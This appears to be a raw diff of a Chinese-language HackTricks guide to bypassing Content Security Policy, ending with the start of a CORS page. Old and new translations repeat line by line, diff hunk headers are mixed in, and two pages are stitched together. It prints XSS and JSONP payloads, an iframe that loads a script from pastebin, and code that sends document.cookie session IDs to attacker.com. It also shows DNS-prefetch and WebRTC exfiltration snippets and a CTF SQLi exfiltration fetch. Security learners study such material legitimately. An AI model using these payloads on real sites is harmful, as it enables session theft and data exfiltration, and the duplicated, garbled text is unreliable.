<input%20id=x%20ng-focus=$event.path|orderBy:%27(z=alert)(document.cookie)%27>#x
?search=<input id=x ng-focus=$event.path|orderBy:'(z=alert)(document.cookie)'>#x
```
段代码突出了使用 `ng-focus` 指令来触发事件,利用 `$event.path|orderBy` 来操作 `path` 数组,并利用 `window` 对象执行 `alert()` 函数,从而揭示 `document.cookie`
个代码片段突出了使用 `ng-focus` 指令触发事件,使用 `$event.path|orderBy` 来操纵 `path` 数组,并利用 `window` 对象执行 `alert()` 函数,从而揭示 `document.cookie`
**在** [**https://portswigger.net/web-security/cross-site-scripting/cheat-sheet**](https://portswigger.net/web-security/cross-site-scripting/cheat-sheet) **中查找其他 Angular 绕过方法**
### AngularJS 和白名单域
### AngularJS 和白名单域
```
Content-Security-Policy: script-src 'self' ajax.googleapis.com; object-src 'none' ;report-uri /Report-parsing-url;
```
### CSP绕过
一个在 Angular JS 应用程序中为脚本加载列入白名单的 CSP 策略可以通过调用回调函数和某些易受攻击的类来绕过。有关此技术的更多信息,请参阅此 [git repository](https://github.com/cure53/XSSChallengeWiki/wiki/H5SC-Minichallenge-3:-%22Sh\*t,-it's-CSP!%22) 中的详细指南。
在Angular JS应用程序中通过调用回调函数和某些易受攻击的类可以绕过为脚本加载列入白名单的域名的CSP策略。有关此技术的更多信息请参阅此[git存储库](https://github.com/cure53/XSSChallengeWiki/wiki/H5SC-Minichallenge-3:-%22Sh\*t,-it's-CSP!%22)上提供的详细指南。
有效载荷示例:
有效的有效载荷:
```html
<script src=//ajax.googleapis.com/ajax/services/feed/find?v=1.0%26callback=alert%26context=1337></script>
ng-app"ng-csp ng-click=$event.view.alert(1337)><script src=//ajax.googleapis.com/ajax/libs/angularjs/1.0.8/angular.js></script>
@ -441,13 +422,15 @@ ng-app"ng-csp ng-click=$event.view.alert(1337)><script src=//ajax.googleapis.com
<!-- no longer working -->
<script src="https://www.googleapis.com/customsearch/v1?callback=alert(1)">
```
其他 JSONP 任意执行端点可以在 [**这里**](https://github.com/zigoo0/JSONBee/blob/master/jsonp.txt) 找到(其中一些已被删除或修复)
### 通过重定向绕过
当CSP遇到服务器端重定向时会发生什么如果重定向导致到达一个未被允许的不同源,它仍然会失败。
CSP 遇到服务器端重定向时会发生什么?如果重定向导致到一个不被允许的不同源,它仍然会失败。
然而,根据[CSP规范4.2.2.3. 路径和重定向](https://www.w3.org/TR/CSP2/#source-list-paths-and-redirects)中的描述,如果重定向导致到一个不同路径,它可以绕过原始限制。
然而,根据 [CSP 规范 4.2.2.3. 路径和重定向](https://www.w3.org/TR/CSP2/#source-list-paths-and-redirects) 中的描述,如果重定向导致到一个不同路径,它可以绕过原始限制。
里有一个例子:
一个例子:
```html
<!DOCTYPE html>
<html>
@ -463,65 +446,65 @@ ng-app"ng-csp ng-click=$event.view.alert(1337)><script src=//ajax.googleapis.com
</body>
</html>
```
如果 CSP设置为 `https://www.google.com/a/b/c/d`,由于路径被考虑在内`/test` `/a/test` 脚本将被 CSP 阻止。
如果CSP设置为`https://www.google.com/a/b/c/d`,由于路径被考虑,`/test`和`/a/test`脚本将被CSP阻止。
然而,最终的 `http://localhost:5555/301` 将在服务器端**重定向到 `https://www.google.com/complete/search?client=chrome&q=123&jsonp=alert(1)//`**。由于这是一个重定向,**路径不被考虑****脚本可以被加载**,从而绕过路径限制。
然而,最终的`http://localhost:5555/301`将会**在服务器端重定向到`https://www.google.com/complete/search?client=chrome&q=123&jsonp=alert(1)//`**。由于这是一个重定向,**路径不被考虑**因此**脚本可以被加载**,从而绕过路径限制。
通过这种重定向,即使路径被完全指定,仍将被绕过。
通过这个重定向,即使路径完全指定,仍然会被绕过。
因此,最佳解决方案是确保网站没有任何开放重定向漏洞,并且 CSP 规则中没有可以被利用的域。
因此最佳解决方案是确保网站没有任何开放重定向漏洞并且CSP规则中没有可以被利用的域
### 使用悬挂标记绕过 CSP
### 通过悬挂标记绕过CSP
阅读[此处的方法](../dangling-markup-html-scriptless-injection/)。
阅读[如何做到这一点](../dangling-markup-html-scriptless-injection/)。
### 'unsafe-inline'; img-src \*; 通过 XSS
### 'unsafe-inline'; img-src \*; 通过XSS
```
default-src 'self' 'unsafe-inline'; img-src *;
```
`'unsafe-inline'` 意味着您可以在代码中执行任何脚本XSS 可以执行代码),`img-src *` 意味着您可以在网页中使用来自任何资源的任何图像。
`'unsafe-inline'` 意味着您可以在代码中执行任何脚本XSS 可以执行代码),`img-src *` 意味着您可以在网页中使用来自任何资源的任何图像。
您可以通过通过图像传输数据来绕过此 CSP在这种情况下XSS 滥用 CSRF其中机器人可以访问的页面包含 SQLi并通过图像提取标志
您可以通过图像泄露数据来绕过此 CSP在这种情况下XSS 滥用一个 CSRF其中一个可被机器人访问的页面包含 SQLi并通过图像提取标志
```javascript
<script>fetch('http://x-oracle-v0.nn9ed.ka0labs.org/admin/search/x%27%20union%20select%20flag%20from%20challenge%23').then(_=>_.text()).then(_=>new Image().src='http://PLAYER_SERVER/?'+_)</script>
```
从:[https://github.com/ka0labs/ctf-writeups/tree/master/2019/nn9ed/x-oracle](https://github.com/ka0labs/ctf-writeups/tree/master/2019/nn9ed/x-oracle)
From: [https://github.com/ka0labs/ctf-writeups/tree/master/2019/nn9ed/x-oracle](https://github.com/ka0labs/ctf-writeups/tree/master/2019/nn9ed/x-oracle)
您还可以滥用此配置来**加载插入图像内部的 JavaScript 代码**。例如,如果页面允许从 Twitter 加载图像。您可以**制作**一个**特殊图像**,将其**上传**到 Twitter 并滥用 "**unsafe-inline**" 来**执行**一个 JS 代码(作为常规 XSS该代码将**加载**图像,**提取**其中的**JS**并**执行** **它**[https://www.secjuice.com/hiding-javascript-in-png-csp-bypass/](https://www.secjuice.com/hiding-javascript-in-png-csp-bypass/)
您还可以利用此配置来**加载插入在图像中的javascript代码**。例如如果页面允许从Twitter加载图像。您可以**制作**一个**特殊图像****上传**到Twitter并利用“**unsafe-inline**”来**执行**JS代码作为常规XSS该代码将**加载**该**图像****提取**其中的**JS**并**执行**它[https://www.secjuice.com/hiding-javascript-in-png-csp-bypass/](https://www.secjuice.com/hiding-javascript-in-png-csp-bypass/)
### 使用 Service Workers
### With Service Workers
Service workers **`importScripts`** 函数不受 CSP 限制:
Service workers **`importScripts`** 函数不受CSP限制
{% content-ref url="../xss-cross-site-scripting/abusing-service-workers.md" %}
[abusing-service-workers.md](../xss-cross-site-scripting/abusing-service-workers.md)
{% endcontent-ref %}
### 策略注入
### Policy Injection
**研究:** [**https://portswigger.net/research/bypassing-csp-with-policy-injection**](https://portswigger.net/research/bypassing-csp-with-policy-injection)
#### Chrome
如果您发送的**参数**被**粘贴到** **策略**的**声明**中,则可以以某种方式**更改**使**其无效**的**策略**。您可以使用以下任何一种绕过方式允许脚本 'unsafe-inline'
如果您发送的**参数**被**粘贴在** **政策的声明**中,那么您可以以某种方式**更改**该**政策**,使其**无效**。您可以使用以下任何绕过方法**允许脚本 'unsafe-inline'**
```bash
script-src-elem *; script-src-attr *
script-src-elem 'unsafe-inline'; script-src-attr 'unsafe-inline'
```
因为这个指令会**覆盖现有的 script-src 指令**。\
你可以在这里找到一个例子[http://portswigger-labs.net/edge\_csp\_injection\_xndhfye721/?x=%3Bscript-src-elem+\*\&y=%3Cscript+src=%22http://subdomain1.portswigger-labs.net/xss/xss.js%22%3E%3C/script%3E](http://portswigger-labs.net/edge\_csp\_injection\_xndhfye721/?x=%3Bscript-src-elem+\*\&y=%3Cscript+src=%22http://subdomain1.portswigger-labs.net/xss/xss.js%22%3E%3C/script%3E)
你可以在这里找到一个例子: [http://portswigger-labs.net/edge\_csp\_injection\_xndhfye721/?x=%3Bscript-src-elem+\*\&y=%3Cscript+src=%22http://subdomain1.portswigger-labs.net/xss/xss.js%22%3E%3C/script%3E](http://portswigger-labs.net/edge\_csp\_injection\_xndhfye721/?x=%3Bscript-src-elem+\*\&y=%3Cscript+src=%22http://subdomain1.portswigger-labs.net/xss/xss.js%22%3E%3C/script%3E)
#### Edge
在 Edge 中更简单。如果你可以在 CSP 中添加这个:**`;_`****Edge** 将**丢弃**整个**策略**。\
例子[http://portswigger-labs.net/edge\_csp\_injection\_xndhfye721/?x=;\_\&y=%3Cscript%3Ealert(1)%3C/script%3E](http://portswigger-labs.net/edge\_csp\_injection\_xndhfye721/?x=;\_\&y=%3Cscript%3Ealert\(1\)%3C/script%3E)
在 Edge 中要简单得多。如果你可以在 CSP 中添加这个: **`;_`** **Edge****丢弃**整个**策略**。\
例子: [http://portswigger-labs.net/edge\_csp\_injection\_xndhfye721/?x=;\_\&y=%3Cscript%3Ealert(1)%3C/script%3E](http://portswigger-labs.net/edge\_csp\_injection\_xndhfye721/?x=;\_\&y=%3Cscript%3Ealert\(1\)%3C/script%3E)
### img-src \*; 通过 XSSiframe- 时间攻击
### img-src \*; 通过 XSS (iframe) - 时间攻击
注意缺少指令`'unsafe-inline'`\
这次你可以让受害者通过**XSS**加载一个在**你控制下**的页面,使用一个 `<iframe`。这次你将让受害者访问你想要提取信息的页面(**CSRF**)。你无法访问页面的内容,但如果你可以**控制页面加载所需的时间**,你就可以提取所需的信息。
注意缺少指令 `'unsafe-inline'`\
这次你可以让受害者通过 **XSS** 使用一个 `<iframe` 加载一个在**你控制**下的页面。这次你将让受害者访问你想要提取信息的页面(**CSRF**)。你无法访问页面的内容,但如果你**控制页面加载所需的时间**,你就可以提取所需的信息。
这次将提取一个**标志**,每当通过 SQLi **正确猜测一个字符**时,由于 sleep 函数**响应**会**花费更多时间**。然后,你将能够提取标志
这次将提取一个**标志**,每当通过 SQLi **正确猜测一个字符**时,**响应**由于 sleep 函数会**花费更多时间**。然后,你将能够提取标志:
```html
<!--code from https://github.com/ka0labs/ctf-writeups/tree/master/2019/nn9ed/x-oracle -->
<iframe name=f id=g></iframe> // The bot will load an URL with the payload
@ -583,15 +566,15 @@ run();
```
### 通过书签小工具
这种攻击需要一些社会工程,攻击者**说服用户将链接拖放到浏览器的书签小工具上**。这个书签小工具会包含**恶意的 JavaScript** 代码,当拖放或点击时会在当前网页窗口的上下文中执行,**绕过 CSP 并允许窃取敏感信息**,比如 cookies 或令牌
此攻击将涉及一些社会工程学,攻击者**说服用户将链接拖放到浏览器的书签小工具上**。此书签小工具将包含**恶意的javascript**代码,当拖放或点击时,将在当前网页窗口的上下文中执行,**绕过CSP并允许窃取敏感信息**例如cookies或tokens
有关更多信息[**查看原始报告**](https://socradar.io/csp-bypass-unveiled-the-hidden-threat-of-bookmarklets/)。
有关更多信息,请[**查看原始报告**](https://socradar.io/csp-bypass-unveiled-the-hidden-threat-of-bookmarklets/)。
### 通过限制 CSP绕过 CSP
### 通过限制CSP绕过CSP
在[**这个 CTF 解密**](https://github.com/google/google-ctf/tree/master/2023/web-biohazard/solution)中,通过在允许的 iframe 中注入一个更严格的 CSP 来绕过 CSP该 CSP 禁止加载特定的 JS 文件,然后通过**原型污染**或**DOM 篡改**允许**滥用不同的脚本来加载任意脚本**。
在[**这个CTF写作**](https://github.com/google/google-ctf/tree/master/2023/web-biohazard/solution)中CSP通过在允许的iframe中注入更严格的CSP来绕过该CSP不允许加载特定的JS文件然后通过**原型污染**或**DOM覆盖**允许**滥用不同的脚本来加载任意脚本**。
您可以使用**`csp`**属性**限制 iframe CSP**
您可以使用**`csp`**属性**限制iframe的CSP**
{% code overflow="wrap" %}
```html
@ -599,73 +582,73 @@ run();
```
{% endcode %}
在[**这个CTF解密**](https://github.com/aszx87410/ctf-writeups/issues/48)中,通过**HTML注入**可以更加**限制**一个**CSP**因此禁用了防止CSTI的脚本从而使**漏洞变得可利用。**\
可以使用**HTML meta标签**使CSP更加严格并且可以通过**删除**允许它们的**nonce**和**通过sha启用特定的内联脚本**来禁用内联脚本
在[**这个CTF写作**](https://github.com/aszx87410/ctf-writeups/issues/48)中,通过**HTML注入**可以**进一步限制**一个**CSP**从而禁用防止CSTI的脚本因此**漏洞变得可利用。**\
可以使用**HTML元标签**使CSP变得更加严格并且可以通过**移除**允许其**nonce**的**入口**来禁用内联脚本并通过sha**启用特定的内联脚本**
```html
<meta http-equiv="Content-Security-Policy" content="script-src 'self'
'unsafe-eval' 'strict-dynamic'
'sha256-whKF34SmFOTPK4jfYDy03Ea8zOwJvqmz%2boz%2bCtD7RE4='
'sha256-Tz/iYFTnNe0de6izIdG%2bo6Xitl18uZfQWapSbxHE6Ic=';">
```
### 使用 Content-Security-Policy-Report-Only 进行 JS 数据泄露
### JS exfiltration with Content-Security-Policy-Report-Only
如果你能够让服务器响应头部 **`Content-Security-Policy-Report-Only`** 的值**由你控制**(可能是因为 CRLF你可以让它指向你的服务器如果你**用** **`<script>`** **包裹**你想要泄露的**JS内容**,并且由于高度可能不允许 `unsafe-inline` 的 CSP这将**触发 CSP 错误**,并且包含敏感信息的脚本的一部分将从 `Content-Security-Policy-Report-Only` 发送到服务器。
如果你能让服务器响应带有 **`Content-Security-Policy-Report-Only`** 头部且 **值由你控制**(可能是因为 CRLF你可以让它指向你的服务器并且如果你 **包裹** 你想要泄露的 **JS 内容** 使用 **`<script>`**,并且因为 CSP 很可能不允许 `unsafe-inline`,这将 **触发 CSP 错误**,并且部分脚本(包含敏感信息)将从 `Content-Security-Policy-Report-Only` 发送到服务器。
例如,[**查看这个 CTF writeup**](https://github.com/maple3142/My-CTF-Challenges/tree/master/TSJ%20CTF%202022/Nim%20Notes)。
对于一个例子 [**查看这个 CTF 文章**](https://github.com/maple3142/My-CTF-Challenges/tree/master/TSJ%20CTF%202022/Nim%20Notes)。
### [CVE-2020-6519](https://www.perimeterx.com/tech-blog/2020/csp-bypass-vuln-disclosure/)
```javascript
document.querySelector('DIV').innerHTML="<iframe src='javascript:var s = document.createElement(\"script\");s.src = \"https://pastebin.com/raw/dw5cWGK6\";document.body.appendChild(s);'></iframe>";
```
### 使用CSP和Iframe泄露信息
### 通过CSP和Iframe泄露信息
* 创建一个指向URL的`iframe`(我们称其为`https://example.redirect.com`该URL在CSP中被允许。
* 然后,该URL重定向到一个未被CSP允许的秘密URL例如`https://usersecret.example2.com`)。
* 通过监听`securitypolicyviolation`事件,可以捕获`blockedURI`属性。该属性会显示被阻止的URI的域从而泄露初始URL重定向到的秘密域
* 创建一个指向一个URL的`iframe`(我们称之为`https://example.redirect.com`该URL被CSP允许。
* 该URL随后重定向到一个秘密URL例如`https://usersecret.example2.com`该URL **不被** CSP允许
* 通过监听`securitypolicyviolation`事件,可以捕获`blockedURI`属性。该属性揭示了被阻止的URI的域名从而泄露了初始URL重定向的秘密域名
有趣的是像Chrome和Firefox这样的浏览器在处理与CSP相关的iframes时有不同的行为,可能会由于未定义的行为导致敏感信息泄露
有趣的是像Chrome和Firefox这样的浏览器在处理与CSP相关的iframes时表现不同,可能导致由于未定义行为而泄露敏感信息
另一种技术涉及利用CSP本身来推断秘密子域。这种方法依赖于二分搜索算法并调整CSP以包含特定被故意阻止的域。例如,如果秘密子域由未知字符组成,可以通过修改CSP指令来阻止或允许这些子域迭代地测试不同的子域。以下是一个显示如何设置CSP以便实现此方法的代码片段
另一种技术涉及利用CSP本身推断秘密子域名。该方法依赖于二分搜索算法并调整CSP以包含故意阻止的特定。例如,如果秘密子域由未知字符组成可以通过修改CSP指令来阻止或允许这些子域逐步测试不同的子域名。以下是一个片段展示了如何设置CSP以促进此方法
```markdown
img-src https://chall.secdriven.dev https://doc-1-3213.secdrivencontent.dev https://doc-2-3213.secdrivencontent.dev ... https://doc-17-3213.secdriven.dev
```
通过监视 CSP 阻止或允许的请求,可以缩小秘密子域中可能的字符范围,最终揭示完整的 URL。
通过监控哪些请求被CSP阻止或允许可以缩小秘密子域名中可能的字符最终揭示完整的URL。
这两种方法利用了 CSP 实现和浏览器行为的微妙之处,展示了看似安全的策略如何无意中泄露敏感信息。
这两种方法利用了CSP在浏览器中的实现和行为的细微差别,展示了看似安全的策略如何无意中泄露敏感信息。
技巧来自[**这里**](https://ctftime.org/writeup/29310)。
来自[**这里**](https://ctftime.org/writeup/29310)的技巧
<figure><img src="../../.gitbook/assets/image (380).png" alt=""><figcaption></figcaption></figure>
加入 [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) 服务器,与经验丰富的黑客和赏金猎人交流!
加入[**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy)服务器,与经验丰富的黑客和漏洞赏金猎人交流!
**黑客见解**\
参与深入探讨黑客活动的刺激和挑战的内容
参与深入探讨黑客的刺激与挑战的内容
**实时黑客新闻**\
通过实时新闻和见解及时了解快节奏的黑客世界
通过实时新闻和见解,跟上快速变化的黑客世界
**最新公告**\
通过最新的赏金计划发布和重要平台更新保持信息更新
了解最新的漏洞赏金启动和重要平台更新
**加入我们** [**Discord**](https://discord.com/invite/N3FrSbmwdy) 并开始与顶尖黑客合作!
**加入我们** [**Discord**](https://discord.com/invite/N3FrSbmwdy),今天就开始与顶级黑客合作!
## 绕过 CSP 的不安全技术
## 绕过CSP的危险技术
### PHP 参数过多导致错误
### 参数过多时的PHP错误
根据[**此视频中最后评论的技术**](https://www.youtube.com/watch?v=Sm4G6cAHjWM),发送太多参数(尽管您也可以使用 POST 参数和超过 20 个文件。由于这将触发错误PHP 网页代码中定义的任何 **`header()`** 都不会被发送
根据[**这个视频中评论的最后一个技术**](https://www.youtube.com/watch?v=Sm4G6cAHjWM)发送过多参数1001个GET参数尽管你也可以使用POST参数和超过20个文件。任何在PHP网页代码中定义的**`header()`**都**不会被发送**,因为这将触发错误
### PHP 响应缓冲区超载
### PHP响应缓冲区溢出
PHP 默认将响应缓冲区设置为 4096 字节。因此,如果 PHP 显示警告,通过在警告中提供足够的数据,**响应**将在**CSP 头之前**被**发送**,导致头部被忽略。\
然后,技术基本上是**用警告填充响应缓冲区**,以便 CSP 不被发送。
PHP以默认方式**缓冲响应到4096**字节。因此如果PHP显示警告通过提供**足够的数据在警告中****响应**将在**CSP头**之前**发送**,导致头被忽略。\
然后,这个技术基本上是**用警告填充响应缓冲区**以便CSP头不被发送。
灵感来自[**这篇文章**](https://hackmd.io/@terjanq/justCTF2020-writeups#Baby-CSP-web-6-solves-406-points)。
来自[**这个写作**](https://hackmd.io/@terjanq/justCTF2020-writeups#Baby-CSP-web-6-solves-406-points)的想法
### 重写错误页面
根据[**这篇文章**](https://blog.ssrf.kr/69),似乎可以通过加载一个错误页面(可能没有 CSP并重写其内容来绕过 CSP 保护。
根据[**这个写作**](https://blog.ssrf.kr/69)似乎可以通过加载一个错误页面可能没有CSP并重写其内容来绕过CSP保护。
```javascript
a = window.open('/' + 'x'.repeat(4100));
setTimeout(function() {
@ -674,40 +657,40 @@ a.document.body.innerHTML = `<img src=x onerror="fetch('https://filesharing.m0le
```
### SOME + 'self' + wordpress
SOME是一种技术利用页面端点中的XSS或高度受限的XSS来滥用**同一源点的其他端点**。这是通过从攻击者页面加载易受攻击的端点,然后刷新攻击者页面到您想要滥用的同一源点中的真实端点来完成的。这样,**易受攻击的端点**可以使用**`opener`**对象在**有效负载**中访问**要滥用的真实端点的DOM**。欲了解更多信息,请查看:
SOME是一种利用XSS或高度限制的XSS**在页面的一个端点**中**滥用****同一来源的其他端点**的技术。这是通过从攻击者页面加载易受攻击的端点,然后将攻击者页面刷新到您想要滥用的同一来源的真实端点来实现的。这样,**易受攻击的端点**可以在**有效载荷**中使用**`opener`**对象来**访问**要滥用的**真实端点的DOM**。有关更多信息,请查看:
{% content-ref url="../xss-cross-site-scripting/some-same-origin-method-execution.md" %}
[some-same-origin-method-execution.md](../xss-cross-site-scripting/some-same-origin-method-execution.md)
{% endcontent-ref %}
此外,**wordpress**在`/wp-json/wp/v2/users/1?_jsonp=data`中有一个**JSONP**端点,将在输出中**反射**发送的**数据**(仅限字母、数字和点)。
此外,**wordpress**在`/wp-json/wp/v2/users/1?_jsonp=data`中有一个**JSONP**端点,该端点将**反射**输出中发送的**数据**(仅限字母、数字和点的限制)。
攻击者可以滥用该端点对WordPress执行**生成SOME攻击**,并将其嵌入到`<script s`rc=`/wp-json/wp/v2/users/1?_jsonp=some_attack></script>`中,请注意此**脚本**将被**加载**,因为它被'`self`'允许。此外由于WordPress已安装攻击者可能会通过**绕过CSP**的**易受攻击的回调**端点滥用**SOME攻击**,以赋予用户更多权限,安装新插件...\
攻击者可以利用该端点**生成针对WordPress的SOME攻击**并将其嵌入`<script s`rc=`/wp-json/wp/v2/users/1?_jsonp=some_attack></script>`中,请注意这个**脚本**将被**加载**,因为它是**被'self'允许的**。此外由于安装了WordPress攻击者可能会通过**易受攻击的****回调**端点滥用**SOME攻击**,该端点**绕过CSP**以给予用户更多权限,安装新插件...\
有关如何执行此攻击的更多信息,请查看[https://octagon.net/blog/2022/05/29/bypass-csp-using-wordpress-by-abusing-same-origin-method-execution/](https://octagon.net/blog/2022/05/29/bypass-csp-using-wordpress-by-abusing-same-origin-method-execution/)
## CSP数据泄漏绕过
## CSP Exfiltration Bypasses
如果存在严格的CSP不允许您与外部服务器**交互**,则总有一些方法可以始终用于泄露信息。
如果存在严格的CSP,不允许您**与外部服务器交互**,则始终可以做一些事情来提取信息。
### Location
您可以简单地更新位置以将秘密信息发送到攻击者的服务器:
您可以更新位置以将秘密信息发送到攻击者的服务器:
```javascript
var sessionid = document.cookie.split('=')[1]+".";
document.location = "https://attacker.com/?" + sessionid;
```
### Meta标签
### Meta tag
您可以通过注入一个meta标签来进行重定向这只是一个重定向,不会泄露内容)
您可以通过注入元标签进行重定向(这只是重定向,不会泄露内容)
```html
<meta http-equiv="refresh" content="1; http://attacker.com">
```
### DNS Prefetch
为了加快页面加载速度,浏览器会预先将主机名解析为 IP 地址并缓存以备后用。\
为了更快地加载页面浏览器将预先解析主机名为IP地址并将其缓存以供后续使用。\
您可以通过以下方式指示浏览器预解析主机名:`<link rel="dns-prefetch" href="something.com">`
您可以利用这种行为通过 DNS 请求**泄露敏感信息**
您可以利用这种行为来**通过DNS请求泄露敏感信息**
```javascript
var sessionid = document.cookie.split('=')[1]+".";
var body = document.getElementsByTagName('body')[0];
@ -720,7 +703,7 @@ linkEl.rel = 'prefetch';
linkEl.href = urlWithYourPreciousData;
document.head.appendChild(linkEl);
```
为了避免这种情况发生,服务器可以发送以下HTTP头
为了避免这种情况发生服务器可以发送HTTP头
```
X-DNS-Prefetch-Control: off
```
@ -730,9 +713,9 @@ X-DNS-Prefetch-Control: off
### WebRTC
一些页面上,你可以看到**WebRTC不检查CSP的`connect-src`策略**。
几个页面上你可以看到**WebRTC不检查CSP的`connect-src`策略**。
实际上,你可以使用_DNS请求_来泄露信息。查看以下代码:
实际上,你可以通过一个_DNS请求_来_泄露_信息。看看这段代码:
```javascript
(async()=>{p=new RTCPeerConnection({iceServers:[{urls: "stun:LEAK.dnsbin"}]});p.createDataChannel('');p.setLocalDescription(await p.createOffer())})()
```
@ -748,12 +731,12 @@ var pc = new RTCPeerConnection({
});
pc.createOffer().then((sdp)=>pc.setLocalDescription(sdp);
```
## 在线检查CSP策略
## 检查 CSP 策略在线
* [https://csp-evaluator.withgoogle.com/](https://csp-evaluator.withgoogle.com)
* [https://cspvalidator.org/](https://cspvalidator.org/#url=https://cspvalidator.org/)
## 自动创建CSP
## 自动创建 CSP
[https://csper.io/docs/generating-content-security-policy](https://csper.io/docs/generating-content-security-policy)
@ -771,29 +754,30 @@ pc.createOffer().then((sdp)=>pc.setLocalDescription(sdp);
<figure><img src="../../.gitbook/assets/image (380).png" alt=""><figcaption></figcaption></figure>
加入[**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy)服务器,与经验丰富的黑客和赏金猎人交流!
加入 [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) 服务器,与经验丰富的黑客和漏洞赏金猎人交流!
**黑客见解**\
参与深入探讨黑客活动的刺激和挑战
参与深入探讨黑客的刺激与挑战的内容
**实时黑客新闻**\
通过实时新闻和见解了解快节奏的黑客世界
通过实时新闻和见解,跟上快速变化的黑客世界
**最新公告**\
了解最新的赏金任务发布和重要平台更新
了解最新的漏洞赏金计划和重要平台更新
**加入我们的** [**Discord**](https://discord.com/invite/N3FrSbmwdy),立即与顶尖黑客合作!
**加入我们** [**Discord**](https://discord.com/invite/N3FrSbmwdy),今天就开始与顶尖黑客合作!
{% hint style="success" %}
学习与实践 AWS 黑客技术:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
学习与实践 GCP 黑客技术: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks 培训 GCP 红队专家 (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>从零开始学习AWS黑客技术成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS Red Team Expert</strong></a><strong></strong></summary>
<summary>支持 HackTricks</summary>
支持HackTricks的其他方式
* 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
* 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们独家的[**NFTs**](https://opensea.io/collection/the-peass-family)收藏品
* **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或 **关注**我们的**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**。**
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
* 查看 [**订阅计划**](https://github.com/sponsors/carlospolop)!
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或 **关注** 我们的 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享黑客技巧。
</details>
{% endhint %}

View file

@ -1,53 +1,54 @@
# CORS - 配置错误和绕过
# CORS - Misconfigurations & Bypass
{% hint style="success" %}
学习和实践 AWS 黑客技术:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
学习和实践 GCP 黑客技术:<img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>从零开始学习AWS黑客技术</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS红队专家</strong></a><strong></strong></summary>
<summary>支持 HackTricks</summary>
支持HackTricks的其他方式
- 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
- 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
- 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)
- **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或 **关注**我们的**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**。**
- 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
* 查看 [**订阅计划**](https://github.com/sponsors/carlospolop)!
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**telegram 群组**](https://t.me/peass) 或 **关注** 我们的 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 分享黑客技巧。
</details>
{% endhint %}
<figure><img src="https://pentest.eu/RENDER_WebSec_10fps_21sec_9MB_29042024.gif" alt=""><figcaption></figcaption></figure>
{% embed url="https://websec.nl/" %}
## 什么是CORS?
## 什么是 CORS
跨源资源共享CORS标准**允许服务器定义谁可以访问它们的资源**以及**允许外部来源使用哪些HTTP请求方法**
跨源资源共享 (CORS) 标准 **使服务器能够定义谁可以访问其资产****哪些 HTTP 请求方法被允许** 来自外部来源
**同源策略**要求**请求资源的服务器**和**托管资源的服务器**共享相同的协议(例如,`http://`)、域名(例如,`internal-web.com`)和**端口**例如80。根据此策略只有来自相同域和端口的网页才被允许访问资源。
**同源** 策略要求 **请求** 资源的服务器和托管 **资源** 的服务器共享相同的协议(例如,`http://`)、域名(例如,`internal-web.com`)和 **端口**例如80。在此策略下仅允许来自同一域和端口的网页访问资源。
`http://normal-website.com/example/example.html`上下文中应用同源策略的示例如下
`http://normal-website.com/example/example.html` 的上下文中,同源策略的应用如下所示
| 访问的URL | 允许访问? |
| ----------------------------------------- | --------------------------------------- |
| `http://normal-website.com/example/` | 是: 相同的协议、域和端口 |
| `http://normal-website.com/example2/` | 是: 相同的协议、域和端口 |
| `https://normal-website.com/example/` | 否: 不同的协议和端口 |
| `http://en.normal-website.com/example/` | 否: 不同的域 |
| `http://www.normal-website.com/example/` | 否: 不同的域 |
| `http://normal-website.com:8080/example/` | 否: 不同的端口\* |
| 访问的 URL | 是否允许访问? |
| ----------------------------------------- | ------------------------------------- |
